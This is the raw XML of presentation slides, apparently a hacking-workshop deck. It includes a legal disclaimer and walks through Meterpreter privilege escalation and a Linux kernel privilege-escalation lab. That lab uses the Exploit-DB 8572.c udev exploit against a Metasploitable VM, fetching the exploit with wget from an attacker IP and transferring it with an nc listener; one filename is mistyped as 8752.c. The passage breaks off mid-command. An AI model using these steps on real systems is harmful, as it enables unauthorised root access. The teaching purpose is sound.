          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> could be preloaded, if not use this to load privilege escalation module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> elevate your permission level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to access the windows shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1028533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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux - Kernel Exploit</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500" dirty="0"/>
              <a:t>There are vulnerabilities found in the Linux kernel and Attackers exploit these vulnerabilities to gain root access to a Linux system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>How attackers do kernel exploits…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Learn about the vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Develop or acquire exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Transfer the exploit onto the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Execute the exploit on the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414922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a:t>The skills taught in these sessions allow identification and exploitation of security vulnerabilities in systems. We strive to give you a place to practice legally, and can point you to other places to practice. These skills should not be used on systems where you do not have explicit permission from the owner of the system. It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VERY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> easy to end up in breach of relevant laws, and we can accept no responsibility for anything you do with the skills learnt here. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>If we have reason to believe that you are utilising these skills against systems where you are not authorised you will be banned from our events, and if necessary the relevant authorities will be alerted. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remember, if you have any doubts as to if something is legal or authorised, just don't do it until you are able to confirm you are allowed to.</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63" name="Google Shape;63;p13"/>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The Legal Bit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ko-KR" dirty="0"/>
              <a:t>Kernel Exploit using Exploit-DB</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1500" dirty="0"/>
              <a:t>For this kernel exploitation, we will use 8572.c exploit in Exploit DB and Metasploit 2 running in VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8572.c exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>takes advantage of a flow in the UDEV device manager, allowing for code execution via an unverified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>Netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> privilege | grep -i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep -i kernel | grep 2.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/8572.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploitdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/exploits/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/8572.c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_kali_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/8752.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to save 8572.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4321(can be any port number) | tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716516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ko-KR" dirty="0"/>
              <a:t>Kernel Exploit using Exploit-DB</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75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>and login to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>msfadmin:msfadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4321(can be any port number) | tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Open a new tab, tar the exploit and pipe the output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, wait a bit for the file transfer and exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
